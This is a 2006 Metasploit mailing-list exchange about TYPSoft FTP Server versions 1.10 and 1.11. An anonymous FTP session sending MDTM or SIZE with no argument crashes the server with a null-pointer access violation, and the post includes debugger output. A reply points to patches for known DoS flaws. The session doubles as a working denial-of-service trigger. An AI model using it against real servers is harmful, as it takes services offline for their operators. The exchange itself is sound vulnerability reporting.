[framework] TYPSoft FTP Server 1.10

Leonardo Joicaliuc myx at amex.ro
Thu Jun 8 15:47:02 CDT 2006 

Testsed 1.11 Stable:
220 TYPSoft FTP Server 1.11 ready...
User (172.16.100.2:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> quote mdtm
501 Access violation at address 00492E54 in module 'ftpserv.exe'. Read of 
addres
s 00000000
ftp> quote size
501 Access violation at address 00492E54 in module 'ftpserv.exe'. Read of 
addres
s 00000000
ftp>

Seems to be the same error like 1.10.

And here is debugger...


First error:
(5a0.a34): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0012f4c8 ecx=00000000 edx=01c9c22c esi=0048f354 
edi=0012f738
eip=00492e54 esp=0012f44c ebp=0012f484 iopl=0         nv up ei pl zr na po 
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b 
efl=00010246
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for 
image00400000
image00400000+0x92e54:
00492e54 80385c           cmp     byte ptr [eax],0x5c 
ds:002b:00000000=??

Second one:

0:000> g
(5a0.a34): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0012f3c0 ecx=00000000 edx=01c9c22c esi=0048f354 
edi=0000000e
eip=00492e54 esp=0012f340 ebp=0012f378 iopl=0         nv up ei pl zr na po 
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b 
efl=00010246
image00400000+0x92e54:
00492e54 80385c           cmp     byte ptr [eax],0x5c 
ds:002b:00000000=??



----- Original Message ----- 
From: "Nicolas RUFF" <nicolas.ruff at gmail.com>
To: <framework at metasploit.com>
Sent: Thursday, June 08, 2006 6:07 PM
Subject: Re: [framework] TYPSoft FTP Server 1.10


>> 220 TYPSoft FTP Server 1.10 ready...
>> User (xx.xx.xx.xx:(none)): anonymous
>> 331 Password required for anonymous.
>> Password:
>> 230 User anonymous logged in.
>> ftp> quote mdtm
>> 501 Access violation at address 00492E54 in module 'ftpserv.exe'. Read
>> of addres
>> s 00000000
>> ftp>
>>
>> Googled, but found nothing about this error. Way to a new exploit ?:))
>
> Hmmm ... did you apply the patches for the 2 known vulnerabilites (DoS)
> on TypSOFT FTP Server ?
>
> For STABLE :
> http://files.typsoft.com/ftpserv-111.zip
> For ALPHA :
> http://files.typsoft.com/typftpd-150A2.zip
>
> Regards,
> - Nicolas RUFF
>

More information about the framework mailing list